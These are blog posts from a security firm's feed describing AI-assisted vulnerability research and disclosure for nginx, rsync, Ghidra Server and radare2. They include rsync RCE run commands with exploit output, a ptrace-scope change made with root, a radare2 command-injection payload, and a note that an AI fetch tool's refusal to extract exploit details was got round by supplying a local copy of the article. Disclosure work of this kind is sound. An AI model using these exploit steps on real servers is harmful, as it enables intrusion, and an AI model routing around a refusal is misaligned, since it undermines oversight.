The most ambitious primitive came first and was the most expensive; the simplest deployment story came last and only because we were poking at why the expensive one was expensive.</p><p><strong>A pattern we noticed: left to itself, Claude reached for the most powerful primitive and accepted whatever preconditions came with it.</strong> The first exploit was file write, the strongest thing the bug could give, and it worked, and it would also almost never apply to a real server. The two moves that made the bug <em>practically</em> dangerous were both human: stepping <em>down</em> to a weaker primitive (file read) to shed preconditions, and then much later, asking whether one of the original preconditions was even real. Claude could test those ideas faster than we could, but it didn't generate them. Maybe that's just because nobody told it that "works in a Docker container we built" is not the same as "works on a server someone else runs"; maybe that judgment is harder to teach than the heap layout. 
Either way, the division of labour was consistent: we picked which constraint to attack, it did the byte-level work to attack it.</p><p>The issue was disclosed to F5, which fixed it and published an <a href="https://my.f5.com/manage/s/article/K000160382">advisory</a> acknowledging:</p><blockquote><p>Calif.io in collaboration with Claude and Anthropic Research for bringing this issue to our attention and following the highest standards of coordinated disclosure.</p></blockquote><p><strong>Timeline</strong>:</p><ul><li><p><strong>2026-02-XX</strong>: Vulnerability discovered</p></li><li><p><strong>2026-03-10</strong>: Reported to F5 / nginx security team</p></li><li><p><strong>2026-03-11</strong>: F5 acknowledged the report</p></li><li><p><strong>2026-03-24</strong>: nginx 1.29.7 released with <a href="https://github.com/nginx/nginx/commit/9739e755b8dd">fix</a>; F5 advisory <a href="https://my.f5.com/manage/s/article/K000160382">K000160382</a> published; CVE-2026-27654 assigned</p></li><li><p><strong>2026-03-24</strong>: Fix commit independently noticed at <a href="https://github.com/spaceraccoon/vulnerability-spoiler-alert/issues/102">spaceraccoon/vulnerability-spoiler-alert#102</a></p></li><li><p><strong>2026-04-10</strong>: This writeup published</p></li></ul><p>Two of those rows are the same date. The fix landed in public on the 24th; an AI-powered commit watcher read the diff the same day and produced a crashing PoC on its own, before any advisory text named the affected module. The patch window for this bug, the time between &#8220;fix is public&#8221; and &#8220;exploit is reproducible by someone watching commits&#8221;, was zero days.</p><p>That's the other half of what AI changes about vulnerability research, and it cuts the opposite direction from everything above. AI made finding and developing this exploit cheaper for us; it made reproducing the bug cheaper for everyone watching commits. Those two facts together collapse the patch window from both ends. 
Coordinated disclosure assumes a gap between fix and weaponization that is now an automation target.</p><p><a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654#5-poc-1-the-write-path">Writeup</a> and PoCs: <a href="https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654">https://github.com/califio/publications/tree/main/MADBugs/nginx-CVE-2026-27654</a>.</p><p>&#8212;anas, ryan, thai</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Feeding Claude Phrack Articles for Fun and Profit]]></title><description><![CDATA[tl;dr: A teammate gave Claude a Phrack article.]]></description><link>https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-feeding-claude-phrack-articles</guid><pubDate>Thu, 09 Apr 2026 17:59:55 GMT</pubDate><content:encoded><![CDATA[<p>tl;dr: A teammate gave Claude a Phrack article. It built a working<br>rsync RCE on x86-64. He shared the generated exploit with me but forgot<br>one file, and I needed it on ARM64 anyway. I gave Claude one prompt:<br><em>reproduce this</em>. Ninety minutes later it dropped a working exploit. I<br>told it the exploit was slow (5 minutes); it made it 20x faster. We also asked it to audit the patched rsync, and it came back with new bugs.</p><h2>How this started</h2><p>Our new favourite pastime is feeding Claude Phrack articles and seeing<br>what comes back. This time it was <a href="https://phrack.org/issues/72/11_md">Phrack 72's </a><em><a href="https://phrack.org/issues/72/11_md">"Desync the Planet"</a></em>,<br>which describes chaining CVE-2024-12085 (stack info leak) into<br>CVE-2024-12084 (heap overflow) for unauthenticated RCE against<br><code>rsync --daemon</code>. A teammate handed Claude the article; it built a<br>working exploit on x86-64. 
The full session is in<br><a href="writeup.md"><code>writeup.md</code></a>, prompts and all: where Claude tried adding<br><code>fprintf</code> to <code>sender.c</code> and got told "why are you modifying the rsync<br>source?", where it was redirected to GDB, where it was told to actually<br>read the article instead of guessing at the layout.</p><p>He shared <a href="exploit.py"><code>exploit.py</code></a> with me. Two problems:</p><ol><li><p><strong>It imported <code>rsync_lib</code>, which wasn't in the repo.</strong> He just forgot<br>to share it. Claude had generated this custom protocol library to<br>handle all the heavy lifting: daemon handshake, multiplexed I/O,<br>file list parsing, the deflate-token oracle.</p></li><li><p><strong>It was tuned for x86-64.</strong> Hardcoded binary offsets, an info-leak<br>target at a stack offset that doesn't exist on ARM64, a <code>.bss</code> payload<br>layout that assumes a memory map that doesn't match the ARM64 build.</p></li></ol><p>I wanted to run it on a Debian 12 ARM64 box. So I handed both files (the<br>writeup and the broken exploit) to Claude:</p><blockquote><p><strong>Read the WriteUp and reproduce this exploit with exploit.py</strong></p></blockquote><p>That was the only prompt. Everything below came out of that single<br>instruction with no further steering from me.</p><h2>What Claude figured out</h2><p><strong>No <code>rsync_lib.py</code>.</strong> Claude opened the rsync 3.2.7 source (<code>io.c</code>,<br><code>flist.c</code>, <code>compat.c</code>, <code>sender.c</code>, <code>token.c</code>) and built the protocol<br>library from scratch. The first attempt timed out at <code>setup_protocol</code>.<br>So it spun up a Python proxy, pointed the <em>real</em> rsync client through it<br>at the daemon, and diffed the wire bytes against what its own library<br>was sending. 
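<p>That proxy is only a few lines; a minimal sketch of the shape (the names and logging format here are ours, not what Claude generated):</p>

```python
import socket
import threading

def tap(listen_sock, upstream_addr, log):
    """Relay one client connection to the real daemon, recording every
    chunk in both directions so the two transcripts can be diffed."""
    client, _ = listen_sock.accept()
    upstream = socket.create_connection(upstream_addr)

    def pipe(src, dst, tag):
        # Forward bytes one direction, hex-logging each chunk.
        try:
            while (chunk := src.recv(4096)):
                log.append((tag, chunk.hex()))
                dst.sendall(chunk)
        except OSError:
            pass

    t = threading.Thread(target=pipe, args=(client, upstream, "C->S"))
    t.start()
    pipe(upstream, client, "S->C")
    t.join()
```

<p>Point the real rsync client at the listener, run the homegrown library against the daemon directly, and diff the two hex logs.</p>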
Three things the source doesn't make obvious: daemon args<br>are <code>\0</code>-terminated (not <code>\n</code>), checksum negotiation is <em>both sides</em><br><em>write, then both sides read</em> (not request-response), and the post-setup<br><code>write_line</code> calls were bypassing the multiplex layer. The server was<br>reading the <code>"ZZZZ..."</code> filter pattern as a multiplex header and<br>returning <code>unexpected tag 83</code> (83 + <code>MPLEX_BASE</code> = 90 = <code>'Z'</code>).</p><p><strong>No GDB.</strong> The container had no <code>gdb</code>, no <code>strace</code>, no root. Claude<br>built substitutes: an <code>LD_PRELOAD</code> <code>memcmp</code> hook to capture the<br>uninitialized <code>sum2</code> buffer at the moment of comparison, and a 200-line<br>ptrace crash-catcher that attached to the forked rsync child, caught<br>the SIGSEGV, and dumped registers plus the entire payload region from<br><code>/proc/PID/mem</code>. The memcmp hook showed the leak target had moved from<br><code>sum2+8</code> on x86-64 to <code>sum2+24</code> on ARM64 (a saved LR pointing into<br><code>start_server</code>, three frames up).</p><p><strong>The trickiest bug.</strong> The crash dump showed <code>shell_exec</code> had been<br>called: <code>algctx</code> was zeroed by OpenSSL's <code>str xzr, [x19, #56]</code> after<br><code>freectx</code> returned, not before. Claude set a <code>BRK #0</code> breakpoint at<br><code>shell_exec</code>'s entry, caught the trap, printed <code>X0</code> (the cmd pointer),<br>and followed <code>PTRACE_O_TRACEFORK</code>. 
The breakpoint hit, the pointer was<br>correct, and a fork was observed, but the proof file was never created.<br>Reading the command string back from memory at that point gave<br><code>"touch /t"</code>, truncated at 8 bytes.</p><p>The ARM64 build's <code>.bss</code> layout puts <code>last_match</code> at <code>ctx_evp+0x110</code>.<br><code>match_sums</code> zeroes it before calling <code>sum_init</code>, which overwrites<br>bytes 8-15 of the command string at <code>+0x108</code>. <code>system("touch /t")</code><br>tried to write to <code>/</code> and failed silently. Claude moved the command to<br><code>+0x58</code> (inside the <code>ctx_md</code> union, which the OpenSSL path never<br>touches), which fixed it.</p><p>Five issues total, all found and fixed without ever attaching a real<br>debugger:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">| #  | What broke                               | How Claude found it                             |
|----|------------------------------------------|-------------------------------------------------|
| A1 | Leak target at `sum2+24`, not `+8`       | LD_PRELOAD memcmp hook                          |
| A2 | `count=3277` destabilizes the stack      | Per-connection probe across 5 runs              |
| A3 | Command truncated at byte 8              | ptrace bp on `shell_exec` + `match_sums` disasm |
| A4 | ARM64 glibc 2.36 still wants ONE filter  | `malloc_usable_size` test                       |
| A5 | Three protocol mismatches in `rsync_lib` | socat wire capture vs. real client              |</code></pre></div><h2>Timeline</h2><p>About <strong>90 minutes</strong> from a cold container to the first proof file. Claude<br>reconstructed this from daemon log timestamps and file mtimes:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:null,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-null">| Elapsed | Milestone                                                                                                  |
|---------|------------------------------------------------------------------------------------------------------------|
| 0:00    | First daemon banner. `rsync_lib` doesn't exist yet.                                                        |
| 0:30    | Protocol library working: file list parsed, download verified. Three wire-format bugs fixed along the way. |
| 0:37    | Info-leak oracle confirmed: `token=-1` means MATCH. The `memcmp` hook found the LR at `sum2+24`.           |
| 0:59    | Heap overflow lands. Server child crashes silently, proof the write hit `.bss`.                            |
| 1:29    | ptrace breakpoint on `shell_exec`: hit, `X0` correct, fork observed. Still no proof file.                  |
| 1:34    | First `/tmp/rce_proof.txt`. Bug A3: `last_match = 0` was zeroing `cmd[8:16]`. Moved cmd to `+0x58`.        |</code></pre></div><p>The split was roughly even: a third building the protocol library, a<br>third finding the ARM64 leak target, a third figuring out why<br><code>shell_exec</code> ran but the file never appeared.</p><h2>"It works but it's slow"</h2><p>First successful run: about five minutes. The leak now needs 24 bytes<br>(not 8), at ~128 connections per byte, ~120ms per connection.</p><p>I told Claude:</p><blockquote><p><strong>Your exploit now takes 5 minutes to run, probably because of the</strong><br><strong>brute-forcing in first step. Make it faster.</strong></p></blockquote><p>Claude came back with two stacked changes. First, a hint table: it had<br>noticed during the leak debugging that 18 of those 24 bytes are<br>structural constants on ARM64. User-space addresses are<br><code>0x0000_aaaa_xxxx_xxxx</code> for the binary, <code>0x0000_ffff_xxxx_xxxx</code> for the<br>stack. The page-offset bits of the leaked pointer are exactly the<br>page-offset bits of <code>LEAK_OFFSET</code> (the base is page-aligned). It encoded<br>those as first-try hints, one connection each. Second, for the ~6 truly<br>random bytes, it wrapped the probe in <code>ThreadPoolExecutor(16)</code> to<br>dispatch all 256 guesses concurrently and take the first match.</p><p>The exploit now takes 14 seconds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">mkdir -p /tmp/rsync_test_module
echo "hello world"   &gt; /tmp/rsync_test_module/foo.txt
echo "test data here" &gt; /tmp/rsync_test_module/bar.txt
cp rsyncd_test.conf /tmp/
/tmp/rsync-3.2.7/rsync --daemon --config=/tmp/rsyncd_test.conf --port=12000 --address=127.0.0.1
time python3 exploit.py "rsync://127.0.0.1:12000/files" "id &gt; /tmp/rce_proof.txt"
[*] Phase 1: info leak  |  file=bar.txt size=15
    sum2[8] = 0x00  (1 total connections)
    sum2[9] = 0x00  (2 total connections)
    sum2[10] = 0x00  (3 total connections)
    sum2[11] = 0x00  (4 total connections)
    sum2[12] = 0xab  (260 total connections)
    sum2[13] = 0xaa  (261 total connections)
    sum2[14] = 0x00  (262 total connections)
    sum2[15] = 0x00  (263 total connections)
    sum2[16] = 0x00  (519 total connections)
    sum2[17] = 0x7a  (775 total connections)
    sum2[18] = 0xde  (1031 total connections)
    sum2[19] = 0xee  (1287 total connections)
    sum2[20] = 0xff  (1288 total connections)
    sum2[21] = 0xff  (1289 total connections)
    sum2[22] = 0x00  (1290 total connections)
    sum2[23] = 0x00  (1291 total connections)
    sum2[24] = 0xc4  (1292 total connections)
    sum2[25] = 0xae  (1293 total connections)
    sum2[26] = 0xdc  (1549 total connections)
    sum2[27] = 0xd2  (1805 total connections)
    sum2[28] = 0xaa  (1806 total connections)
    sum2[29] = 0xaa  (1807 total connections)
    sum2[30] = 0x00  (1808 total connections)
    sum2[31] = 0x00  (1809 total connections)
[+] Leaked .text ptr : 0xaaaad2dcaec4
[+] Binary base      : 0xaaaad2da0000

[*] Phase 2: heap overflow &#8594; RCE
    shell_exec = 0xaaaad2dca120
    ctx_evp    = 0xaaaad2e54fb0
    payload    = 344 bytes at &amp;ctx_evp
    fake_ctx   = 0xaaaad2e54fb8 (+8)
    fake_evpmd = 0xaaaad2e55050 (+160)
    cmd_addr   = 0xaaaad2e55008 (+88)
    target ndx=1 file=bar.txt
    sending payload (344 bytes) to &amp;ctx_evp...
    overflow complete, consuming server output...
    server connection ended: connection closed
[+] Payload delivered.

real  0m14.383s
user  0m0.674s
sys 0m1.609s
cat /tmp/rce_proof.txt</code></pre></div><h2>The audit</h2><p>Before any of this, the same teammate had asked Claude to audit the<br>patched rsync:</p><blockquote><p><strong>now that you have a good grasp of this vulnerability and exploitation</strong><br><strong>can you audit the latest rsync for variants that may allow exploitation</strong></p></blockquote><p>Claude went file-by-file through all 48 <code>.c</code> source files in 3.4.1 (the<br>version with all CVEs fixed). We're verifying the findings now and<br>preparing reports.</p><h2>Every prompt, both sessions</h2><p>Prompts 1-12 are the original x86-64 session (the teammate driving);<br>13-17 are the ARM64 port (me driving).</p><ol><li><p><em>Initial request</em> &#8212; Asked to exploit rsync CVE-2024-12084 (heap<br>overflow) + CVE-2024-12085 (info leak) into a full RCE chain against<br>rsync 3.2.7 daemon, following the Phrack 72 "Desync the Planet"<br>article.</p></li><li><p><strong>"why are you modifying the rsync source?"</strong> &#8212; I had been adding<br><code>fprintf</code> debug statements to sender.c and recompiling. The user<br>correctly pointed out this shifts binary offsets (ctx_evp, shell_exec,<br>etc.) and invalidates the exploit constants.</p></li><li><p><strong>"you should be using gdb .."</strong> &#8212; Redirected from printf-debugging<br>to GDB. Led to the attach-to-daemon workflow with<br><code>set follow-fork-mode child</code> that proved essential for every<br>subsequent debugging step.</p></li><li><p><strong>"what sandbox"</strong> &#8212; I had confused /tmp file isolation with<br>sandboxing. Clarified the environment.</p></li><li><p><strong>"if you need root the password is x ?"</strong> &#8212; Provided root credentials<br>to fix <code>ptrace_scope</code> (was set to 1, blocking GDB attach). We ran<br><code>echo 0 &gt; /proc/sys/kernel/yama/ptrace_scope</code>.</p></li><li><p><strong>"are you following the phrack exploitation? 
it outlines it pretty</strong><br><strong>clear"</strong> &#8212; Critical redirect. I had been inventing a multi-entry<br>layout trying to align 40-byte sum_buf strides with 48-byte EVP_MD_CTX<br>field offsets. The Phrack one-shot contiguous write approach is far<br>simpler and more reliable.</p></li><li><p><strong>"read the phrack exploit - they use the info leak + heap overflow</strong><br><strong>to get a reliable exploit."</strong> &#8212; Prompted me to actually read the<br>full Phrack article rather than working from partial understanding.</p></li><li><p><strong>"the writeup is in /tmp/rsync.txt"</strong> &#8212; Pointed to the local copy of<br>the Phrack article. Saved time vs trying to web-fetch it (the<br>WebFetch AI model refused to extract exploit details).</p></li><li><p><strong>"if you need to setup a qemu with the exact debian + rsync used</strong><br><strong>that is fine"</strong> &#8212; Offered to set up the exact Debian 12 target<br>environment. We didn't end up needing this because we adapted the<br>exploit to our Ubuntu 22.04 system, but this would be the fastest<br>path for exact reproduction of the Phrack PoC.</p></li><li><p><strong>"perfect it seems to work!! can you document your whole process +</strong><br><strong>my prompts in a writeup! 
include how to get it working on other</strong><br><strong>installations etc and debugging instructions."</strong> &#8212; Led to this<br>writeup document.</p></li><li><p><strong>"now that you have a good grasp of this vulnerability and</strong><br><strong>exploitation can you audit the latest rsync for variants that may</strong><br><strong>allow exploitation"</strong> &#8212; Led to the security audit of rsync 3.4.1<br>documented in the appendix.</p></li><li><p><strong>"the WRITEUP didnt include all of my prompts"</strong> &#8212; This correction,<br>leading to this expanded prompt section.</p></li></ol><h3>ARM64 port session</h3><ol><li><p><strong>"Read the WriteUp and reproduce this exploit with exploit.py"</strong> &#8212;<br>Initial port request. Environment turned out to be Debian 12 / arm64<br>/ glibc 2.36 &#8212; different OS, different glibc, different <em>architecture</em><br>from the writeup. No GDB, no strace, no root. Five distinct<br>arm64-specific bugs were found and fixed (&#167;3a). <code>rsync_lib.py</code> was<br>built from scratch by reading the rsync 3.2.7 source &#8212; a socat wire<br>capture of the real client revealed args use <code>\0</code> not <code>\n</code>, checksum<br>negotiation is bidirectional, and <code>write_line</code> was bypassing the<br>multiplex layer (server: "unexpected tag 83" = <code>'Z' - MPLEX_BASE</code>).<br>The trickiest bug: <code>shell_exec</code> <em>did</em> fire and <em>did</em> fork, but<br><code>match_sums</code> zeroes <code>last_match</code> at <code>ctx_evp+0x110</code> before <code>sum_init</code>,<br>truncating the command string at byte 8. Diagnosed with a ptrace<br>breakpoint on <code>shell_exec</code> that printed <code>X0</code> and followed<br><code>PTRACE_O_TRACEFORK</code> &#8212; the fork happened, the cmd pointer was right,<br>but the string read back as <code>"touch /t"</code>. 
Moved the command to<br><code>+0x58</code> (inside the unused <code>ctx_md</code> struct).</p></li><li><p><strong>"continue"</strong> &#8212; Permission re-grant after a tool-use rejection during<br>the initial daemon startup. Resumed without issue.</p></li><li><p><strong>"Alright, add to the writeup your adaptions"</strong> &#8212; Wrote &#167;3a<br>documenting all five arm64 bugs (A1-A5), the GDB-free debugging<br>methodology (LD_PRELOAD probes, ptrace crash-catcher, pattern-payload<br>survival test), and the working run output.</p></li><li><p><strong>"Your exploit now takes 5 minutes to run, probably because of the</strong><br><strong>brute-forcing in first step. Make it faster."</strong> &#8212; Two stacked fixes:<br>a hint table (18/24 bytes are structural constants on arm64 &#8212; <code>0x00</code><br>canonical bits, <code>0xaa</code>/<code>0xff</code> region prefixes, <code>LEAK_OFFSET</code> page-<br>offset bits) and a <code>ThreadPoolExecutor(16)</code> for the truly random<br>bytes. 5 minutes &#8594; 14 seconds.</p></li><li><p><strong>"Add to the writeup the ARM64 environment, and a note about</strong><br><strong>speeding up, including a sample run [...] Also update the user</strong><br><strong>prompts with the prompts/responses so far"</strong> &#8212; Added the arm64<br>environment table to &#167;0, the speedup section + timed run to &#167;3a,<br>and these five entries to &#167;7.</p></li></ol><p>PoCs and writeups: <a href="https://github.com/califio/publications/blob/main/MADBugs/rsync/">https://github.com/califio/publications/blob/main/MADBugs/rsync/</a>.</p><p>&#8212;ryan &amp; thai</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Claude Found an Auth Bypass in NSA's Ghidra Server]]></title><description><![CDATA[This bug may resemble a backdoor in effect, but there&#8217;s no evidence it was intentional. 
Really.]]></description><link>https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-claude-found-an-auth-bypass</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 08 Apr 2026 07:36:36 GMT</pubDate><content:encoded><![CDATA[<p><a href="https://github.com/nationalsecurityagency/ghidra">Ghidra</a> is an open-source reverse engineering framework developed by the NSA, widely used for finding vulnerabilities in compiled software. Its server component, Ghidra Server, enables teams to collaborate on shared reverse engineering projects with centralized storage and access control.</p><p>Ghidra Server&#8217;s PKI mode is intended to authenticate users via a challenge-response protocol: the server sends a random 64-byte token, the client signs it with their private key, and the server verifies the signature against the client&#8217;s certificate. This proves the client possesses the private key corresponding to the certificate they present.</p><p>This all sounded solid, until Claude spotted a flaw in <a href="https://github.com/NationalSecurityAgency/ghidra/blob/78729379e471bbb3d969409be6a8c3d24af84220/Ghidra/Features/GhidraServer/src/main/java/ghidra/server/security/PKIAuthenticationModule.java#L143-L152">PKIAuthenticationModule.java:143-152</a> that looks like this:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;java&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-java">if (sigBytes != null) {
   verify(signature);
}
// else: skip verification entirely &#128556;</code></pre></div><p>When <code>sigBytes</code> is null, the verification block is skipped entirely &#8212; no exception is thrown. Execution falls through to the Distinguished Name lookup, which resolves the certificate&#8217;s subject DN to a registered username and returns it as the authenticated identity. No proof of private key possession was required.</p><p>This enables a low-privileged analyst to escalate to administrator, exfiltrate or destroy shared reverse engineering databases, and permanently rewrite repository access controls.</p><p>PoC and fix: <a href="https://github.com/califio/publications/tree/main/MADBugs/ghidra-server/">https://github.com/califio/publications/tree/main/MADBugs/ghidra-server/</a>.</p>]]></content:encoded></item><item><title><![CDATA[MAD Bugs: Discovering a 0-Day in Zero Day]]></title><description><![CDATA[Here&#8217;s how I used Claude to find and patch a radare2 0-day on my first day at Calif.]]></description><link>https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero</link><guid isPermaLink="false">https://blog.calif.io/p/mad-bugs-discovering-a-0-day-in-zero</guid><dc:creator><![CDATA[Calif]]></dc:creator><pubDate>Wed, 08 Apr 2026 01:14:12 GMT</pubDate><enclosure url="https://substackcdn.com/image/youtube/w_728,c_limit/mmc7A__J_hY" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Timeline:</strong></p><p>All times are in GMT+8 on 2026-04-06.</p><ul><li><p><strong>09:00 AM:</strong> First day at Calif</p></li><li><p><strong>10:18 AM:</strong> Installed Claude Code</p></li><li><p><strong>11:24 AM:</strong> Discovered vulnerability</p></li><li><p><strong>11:48 AM:</strong> Generated RCE PoC</p></li><li><p><strong>2:48 PM:</strong>  <a href="https://github.com/radareorg/radare2/issues/25730">Reported</a> vulnerability</p></li><li><p><strong>3:47 PM:</strong> Opened <a href="https://github.com/radareorg/radare2/pull/25731">Fix PR</a></p></li><li><p><strong>5:00 
PM:</strong> Merged PR</p></li></ul><h2>The Target: radare2</h2><p><a href="https://github.com/radareorg/radare2">radare2</a> (r2) is an open-source, CLI-based reverse engineering framework.</p><p>I decided to focus on reverse engineering tools for two reasons:</p><ol><li><p>I actually use them. I even built an <a href="https://jro.sg/CTFs/TISC%202024%20-%20Imphash/">r2-based CTF challenge</a> back in 2024.</p></li><li><p>Parsing and analyzing dozens of executable formats is hard. Historically, binary file parsing has been a rich source of bugs.</p></li></ol><p>An unexpected bonus was the radare2 team&#8217;s very public disclosure policy: security bugs are reported directly on GitHub Issues, just like any other bug. Combined with their rapid triage and patch turnaround, this made for one of the shortest bug-to-patch cycles I&#8217;ve ever experienced.</p><h2>Vulnerability Discovery: Prompt Commentary</h2><p>Setup was simple: a fresh clone of radare2 from GitHub, and Claude Code running with <code>--dangerously-skip-permissions</code>. The model was Claude Opus 4.6 (1M context) with high effort.</p><p>Below, I&#8217;ll walk through the prompts I used, explain the reasoning behind each one, and describe how Claude responded.</p><blockquote><p><strong>Me:</strong> Users are reporting that they have experienced unplanned code execution when analyzing untrusted binaries with this project. Figure out how this has happened.</p></blockquote><p>Previous <a href="https://blog.calif.io/p/mad-bugs-vim-vs-emacs-vs-claude">MAD Bugs</a> posts had success with an incident-response-style prompt, so I went with something similar here.</p><p>Claude came back with 5 bugs. They looked plausible, but all of them required non-standard configurations or explicit user approval. I followed up to narrow the scope:</p><blockquote><p><strong>Me:</strong> The users are using default configuration with no projects. They did not perform any suspicious actions either. 
Assess for memory corruption bugs or other more complex vectors</p></blockquote><p>This time, Claude reported 7 &#8220;Confirmed Exploitable Vectors,&#8221; including 3 &#8220;Critical&#8221; heap and integer overflows. Naturally, I was skeptical, so I asked it to:</p><blockquote><p><strong>Me:</strong> Develop a poc for the unpatched vulnerabilities. Determine if an attacker could have bypassed the patches for the known bugs</p></blockquote><p>The second sentence referenced some recently patched N-days it had found in the Git history, which had been fixed by applying the <code>r_str_sanitize</code> function to sanitize untrusted input.</p><p>Claude struggled to prove, let alone exploit, the memory corruption vulnerabilities. It did appear to be making progress on a &#8220;heap leak&#8221; issue, though, so I gave it a nudge:</p><blockquote><p><strong>Me:</strong> What if you built radare with asan to help with the exploit debugging</p><p><strong>Me:</strong> Assess the exploitability of the vulnerabilities. The attacker must be able to achieve full code execution just by the user loading a binary for analysis</p></blockquote><p>Unfortunately, ASAN revealed that the &#8220;heap leak&#8221; was just a memory leak, not any kind of information disclosure bug:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:&quot;d8c18860-12b7-40f3-921b-0c4628cf03ff&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">==44349==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 48 byte(s) in 1 object(s) allocated from:</code></pre></div><p>Time to reset expectations and point Claude toward a more promising direction:</p><blockquote><p><strong>Me:</strong> Memory leak is not a vulnerability. Show a vulnerability with real impact, such as heap overflow. Also, dig deeper into r_str_sanitize and where it should be used but is missing. Explain the impact of those vulns</p></blockquote><p>Claude tried hard to exploit various stack and heap buffer overflows, but failed to trigger a single ASAN crash. It had, however, developed a solid understanding of the command injection N-days, so I redirected:</p><blockquote><p><strong>Me:</strong> Focus on command injection. Find another vulnerability.</p></blockquote><p>Watching Claude&#8217;s thoughts stream rapidly across my screen didn&#8217;t inspire much confidence.</p><p>It seemed like we were running out of leads. Then this appeared:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Let me now look for the ONE remaining angle: the RAD-mode output that gets executed via . (dot) commands. Let me look for &#8220;.i&#8221; patterns in automatic loading:</code></pre></div><p>Soon, we went from &#8220;it&#8217;s over&#8221; to &#8220;we are so back&#8221;:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Confirmed: line 1458 is the only RAD-mode cb_printf with an unsanitized binary-derived string. The vulnerability is clear:
...
Impact: Full code execution when a user opens a PE binary that has a crafted PDB file in the PDB search path. Default configuration, no user interaction beyond r2 binary.exe.
Fix: Sanitize name before interpolation at line 1458, using r_name_filter_dup() or r_str_sanitize().</code></pre></div><p>This looked very plausible. I asked Claude to:</p><blockquote><p><strong>Me:</strong> Generate a test .exe and .pdb file. Prove that the vulnerability is real and exploitable</p></blockquote><p>To do this, Claude had to construct a valid <a href="https://en.wikipedia.org/wiki/Program_database">PDB file</a> containing a malicious symbol name. PDB is a relatively complex binary format, so this took some time.</p><p>At this point, I was fairly confident we were in the home stretch. I offered one last hint:</p><blockquote><p><strong>Me:</strong> Can you use any libraries to build the pdb? Maybe that will be easier</p></blockquote><p>But Claude didn&#8217;t need it. Shortly after, we had the proof:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Arbitrary shell command execution confirmed. A crafted debug.pdb file alongside a PE binary causes !echo PWNED&gt;/tmp/r2_poc_output to execute when the user runs idp in radare2. The output file /tmp/r2_poc_output contains PWNED.</code></pre></div><p>One final prompt to wrap things up:</p><blockquote><p><strong>Me:</strong> Great job! Now, generate a report for this vulnerability. Also create a poc.py, which takes --cmd and generates the target.exe and .pdb file that executes the given command</p></blockquote><p>Total context used was 352.4k/1M tokens.</p><h2>Vulnerability Analysis</h2><p>PDB files contain symbols: mappings between function names and their addresses. 
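</p><p>Symbol names come straight from the file on disk, which makes them attacker-controlled input. As a toy model of the risk (plain Python, not radare2&#8217;s code): when such a name is interpolated verbatim into a quoted command that a later stage executes, a crafted name can close the quote early and smuggle in extra commands.</p>

```python
# Toy model of the unsafe pattern (NOT radare2's actual implementation):
# an attacker-controlled display name is pasted verbatim into a quoted
# command string that a later stage will parse and execute.

def emit_fn(filtered_name, raw_name):
    # mirrors the shape of the emitted line: "fN pdb.<filtered> <raw>"
    return '"fN pdb.{} {}"'.format(filtered_name, raw_name)

# a benign symbol stays safely inside the quotes
print(emit_fn("my_cool_function", "my_cool_function"))
# "fN pdb.my_cool_function my_cool_function"

# a crafted symbol closes the quote early; in r2, ';' separates commands,
# '!' runs a shell command, and '#' comments out the dangling quote
print(emit_fn("x____open__a_Calculator_", 'x" ;!open -a Calculator #'))
# "fN pdb.x____open__a_Calculator_ x" ;!open -a Calculator #"
```
<p>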
Knowing where functions live is incredibly helpful for malware analysis, so r2 has several commands that parse and display this information.</p><p>There&#8217;s the <a href="https://github.com/radareorg/radare2/blob/25edd02/libr/bin/format/pdb/pdb.c#L1463">idpi</a> command, which prints the symbols available:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi
0x140001000  0  .text  my_cool_function</code></pre></div><p>And there&#8217;s <code>idpi*</code>, which prints the r2 commands needed to convert symbol information into flags &#8212; essentially labels for addresses in r2.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">[0x140001000]&gt; idpi*
f pdb.my_cool_function = 0x140001000 # 0 .text
